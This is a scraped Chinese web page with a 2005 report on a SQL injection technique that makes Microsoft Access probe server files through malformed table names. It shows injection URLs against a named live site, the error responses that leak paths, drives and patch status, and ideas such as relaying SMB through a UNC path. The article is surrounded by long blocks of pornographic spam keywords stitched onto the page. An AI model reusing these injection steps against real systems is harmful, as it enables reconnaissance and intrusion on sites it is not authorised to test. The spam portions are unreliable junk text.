国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

access數據庫跨文件查詢漏洞的初步報告
2005-12-17   

一. 在一次玩sql injection時無意發現了這個漏洞:
1.訪問http://www.lznet.net/news/displaynews.asp?id=24794'
頁面出錯信息:
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的語法錯誤 在查詢表達式 'id = 24794'' 中。
/news/displaynews.asp,行133
2.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=1
頁面正常
3.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=2
頁面返回"找不到文件"
這是典型的sql injection with access漏洞,接下來猜表名:
4.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from news)
頁面出錯:數據庫引擎找不到輸入表或查詢 'news'
5.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from admin)
頁面出錯:數據庫引擎找不到輸入表或查詢 'admin'
6.突然想起了sql injection技術中得到的出錯信息中表名格式為: news.id
其中news為表名,id為表中的一個列名
7.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from lznet.a)
出錯:找不到文件 'C:WINNTsystem32lznet.mdb'。
8.試遍了web根目錄以及所有知道的虛擬目錄,都下載不到這個lznet.mdb,仔細一看原來是lznet.mdb這個文件名是自己定義的。但是,是什么原因泄露系統目錄的物理路徑呢?繼續試試能不能查詢c:winntsystem32下的cmd.exe文件.
9.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from cmd.exe.a)
這條語句格式是經過多次試驗得到的:)
出錯:"數據庫引擎打不開文件'C:WINNTsystem32CMD.EXE'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。 "
分析以上出錯信息,我想權限是有的,因為我們是基于asp的guest權限,默認cmd.exe是Everyone:R ,如果打不開那就是數據庫不支持了,但是文件夾是可以被數據庫訪問,否則我們是搜索不到其中的文件的。
10.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:cmd.exe.a)
在這里我們可以看到跨目錄查詢是可行的
出錯:
找不到文件 'c:cmd.exe'。
11.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:oot.ini.a)
注:boot.ini是win2000在系統盤根目錄下的系統引導文件
出錯:
據庫引擎打不開文件'c:oot.ini'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
12.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from d:oot.ini.a)
跨盤符查詢也是可行的
出錯:
找不到文件 'd:oot.ini'。
13.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from i:oot.ini.a)
出錯:
'i:oot.ini'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
注:我們看到出錯信息很老實的告訴了我們這個系統沒有i盤,從側面說access的出錯信息在某些方面還是比較詳細的。
14.這是個比較實際的利用,如果對方是從spx打到spx,在winnt目錄下就會有這些文件,我們可以通過這個漏洞查找這些文件,確定目錄主機打補丁的情況:
[$NtUninstallQ329553$] [$NtUninstallQ329834$]
[$NtUninstallQ331953$] [$NtUninstallQ810833$]
[$NtUninstallQ811114$] [$NtUninstallQ811493$]
[$NtUninstallQ815021$] [$NtUninstallSP2SRP1$]
……………
二.漏洞的利用設想:
1.查詢某個動態網頁文件,利用查詢語句獲取動態網頁的源代碼,比如讀取文件內容并把內容寫入到表的一個列里,然后用len暴力猜列里的內容,從而得到源碼。
2.猜測目錄的位置、文件名等等,了解對方的一點主機信息,比如說系統安裝在哪個分區上,共有幾個分區以及系統打的什么補丁等等。
3.查詢unc路徑,如\1.1.1.1sharea.vbs,而\1.1.1.1運行著smbrelay,我們利用smb重定向技術有能會得到一個guest權限的ipc連接,這就有意思多了。
4.查找敏感文件,比如*.cif,*.mdb等等,但是我沒有實現在access上使用通配符查詢文件,可能是因為我是數據庫新手的問題。
5.執行文件,可以的話就發財了.
6.以上設想可能有理解錯誤正在驗證中(你想到什么就告訴我吧)
有關我對這個漏洞的理解:
access對表和列的查詢存在問題,如果我們構造一個畸型表名的話,access找不到這樣的表就會當成mdb文件去查找,如果構造得當,就會當成一個文件去到硬盤上查找!(默認在system32下查找。我在sql server也簡單測試了一下,沒有發現這個問題。另外利用這個漏洞需要兩個條件(怕有的人不理解):
(1)對方是asp+access應用體系,并且asp代碼存在過濾不足的問題使我們可以遠程注射sql語句。
(2)asp要能顯示查詢失敗的詳細信息,比如"數據庫引擎找不到輸入表或查詢 'news'"。否則我們無論查詢是否成功都變的沒有意義。

熱詞搜索:

上一篇:Discuz論壇短消息未限制發送次數漏洞
下一篇:暴庫入侵OBLOG!

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲另类在线视频| 韩国三级中文字幕hd久久精品| 三级久久三级久久| 欧美一级日韩不卡播放免费| 麻豆一区二区三区| 精品美女在线播放| 成人网在线免费视频| 亚洲人成亚洲人成在线观看图片 | 一区二区三区视频在线观看| 欧美日韩一区中文字幕| 蜜桃视频在线一区| 国产精品黄色在线观看| 欧美精品aⅴ在线视频| 国产米奇在线777精品观看| 亚洲视频香蕉人妖| 日韩欧美一二三区| 色婷婷av一区二区| 国产一区二区日韩精品| 夜夜嗨av一区二区三区中文字幕| 欧美一区2区视频在线观看| 极品美女销魂一区二区三区免费| 亚洲天堂精品视频| 欧美v日韩v国产v| 91麻豆国产香蕉久久精品| 免费观看在线综合色| 亚洲人成网站精品片在线观看| 日韩视频一区在线观看| 日本高清成人免费播放| 美日韩一区二区| 亚洲五码中文字幕| 国产精品另类一区| 乱中年女人伦av一区二区| 国产精品视频免费看| 这里只有精品免费| 欧美午夜一区二区三区| 成人国产一区二区三区精品| 久久精品国产99| 日韩在线a电影| 亚洲国产精品久久人人爱| 综合av第一页| 国产精品全国免费观看高清| 精品久久99ma| 欧美精品一二三四| 欧美熟乱第一页| 欧美亚一区二区| 91麻豆精品秘密| 成人精品电影在线观看| 国产一区二区在线看| 日韩黄色小视频| 婷婷亚洲久悠悠色悠在线播放| 亚洲精品免费电影| 一区二区三区加勒比av| 一区二区三区在线视频免费观看 | 久久久综合视频| 日韩你懂的电影在线观看| 51精品国自产在线| 日韩欧美国产一区二区在线播放| 欧美一区二区三区视频在线| 欧美日韩一区 二区 三区 久久精品| 色婷婷精品大视频在线蜜桃视频| 色综合久久99| 欧美日韩一区二区三区视频| 欧美一级二级在线观看| 26uuu国产一区二区三区| 久久综合九色综合欧美亚洲| 久久久精品2019中文字幕之3| 久久久蜜臀国产一区二区| 国产欧美日韩综合精品一区二区| 国产精品久久久久久一区二区三区 | 日韩一二在线观看| 精品国精品国产尤物美女| 久久青草国产手机看片福利盒子| 国产欧美精品一区二区色综合 | 亚洲香肠在线观看| 麻豆精品一区二区综合av| 国模大尺度一区二区三区| 成人综合在线观看| 一本一本久久a久久精品综合麻豆| 欧美性色aⅴ视频一区日韩精品| 欧美群妇大交群的观看方式| 精品国产第一区二区三区观看体验| 国产日韩精品一区二区三区| 亚洲免费观看视频| 日韩二区三区在线观看| 国产成人在线视频网站| 日本丶国产丶欧美色综合| 日韩免费性生活视频播放| 国产午夜三级一区二区三| 亚洲伊人伊色伊影伊综合网| 韩国三级在线一区| 欧美日韩一区不卡| 亚洲国产精品成人久久综合一区| 一区二区在线看| 韩国理伦片一区二区三区在线播放| 99精品在线免费| 精品国产91乱码一区二区三区| 国产精品精品国产色婷婷| 日本成人在线电影网| 成人福利电影精品一区二区在线观看| 在线观看视频一区二区欧美日韩| 精品久久久久av影院| 亚洲自拍与偷拍| 成人精品免费看| 精品处破学生在线二十三| 亚洲综合一区二区三区| 丁香天五香天堂综合| 日韩精品一区二区在线观看| 亚洲免费三区一区二区| 大胆欧美人体老妇| 精品免费日韩av| 琪琪一区二区三区| 在线综合视频播放| 亚洲观看高清完整版在线观看 | 国产精品一二三四| 欧美精三区欧美精三区| 亚洲人亚洲人成电影网站色| 国产东北露脸精品视频| 欧美电视剧在线看免费| 天天射综合影视| 欧美亚洲国产一区在线观看网站| 亚洲图片另类小说| 99久久婷婷国产综合精品| 欧美国产日韩亚洲一区| 国产在线一区观看| 久久久青草青青国产亚洲免观| 久久97超碰国产精品超碰| 日韩欧美国产系列| 开心九九激情九九欧美日韩精美视频电影 | 国产精品综合视频| 久久综合久久综合九色| 国产一区二区免费在线| 久久精品人人爽人人爽| 国产精品一区二区在线播放 | 国产一区亚洲一区| 日韩欧美国产高清| 国产一区二区福利视频| 国产日韩v精品一区二区| 粉嫩aⅴ一区二区三区四区五区| 精品国产一区二区国模嫣然| 国产在线不卡一卡二卡三卡四卡| 26uuu亚洲| 不卡高清视频专区| 一区二区三区在线免费视频| 欧美色中文字幕| 免费av网站大全久久| 久久午夜羞羞影院免费观看| 国产成人av一区二区| 国产精品国产自产拍高清av | 国产成人免费在线观看| 亚洲婷婷在线视频| 欧美日韩激情一区二区三区| 麻豆精品国产91久久久久久| 久久久久亚洲综合| 日本丶国产丶欧美色综合| 奇米777欧美一区二区| 国产日韩欧美一区二区三区综合| av激情成人网| 日韩不卡在线观看日韩不卡视频| 久久久久久久久99精品| 91女人视频在线观看| 视频在线在亚洲| 国产精品久久一级| 91久久精品国产91性色tv| 蜜臀av性久久久久蜜臀aⅴ四虎| 国产欧美一区二区精品性色超碰 | 亚洲福利视频一区| 久久午夜色播影院免费高清 | 国产精品日韩精品欧美在线| 欧美在线你懂得| 精品一区二区在线观看| 综合久久给合久久狠狠狠97色| 欧美日产在线观看| 91麻豆免费观看| 国产成人啪免费观看软件| 色美美综合视频| 国产激情视频一区二区在线观看| 91亚洲资源网| 日韩精品每日更新| 国产欧美日韩精品在线| 777久久久精品| 久久精品国产一区二区| 精品成人佐山爱一区二区| 日韩视频一区二区三区在线播放| 99视频一区二区| 91一区二区在线| 成人黄动漫网站免费app| 精品久久久久久最新网址| 91色|porny| 亚洲免费观看高清完整版在线观看熊| 欧美日韩精品一区二区三区蜜桃| 久久国产精品99精品国产| 免费日本视频一区| 国产成人鲁色资源国产91色综| 91在线看国产| 粉嫩一区二区三区在线看| 精品一区二区在线视频| 成人午夜电影小说| 成人一区二区三区在线观看| 日韩极品在线观看| 日韩电影一区二区三区四区|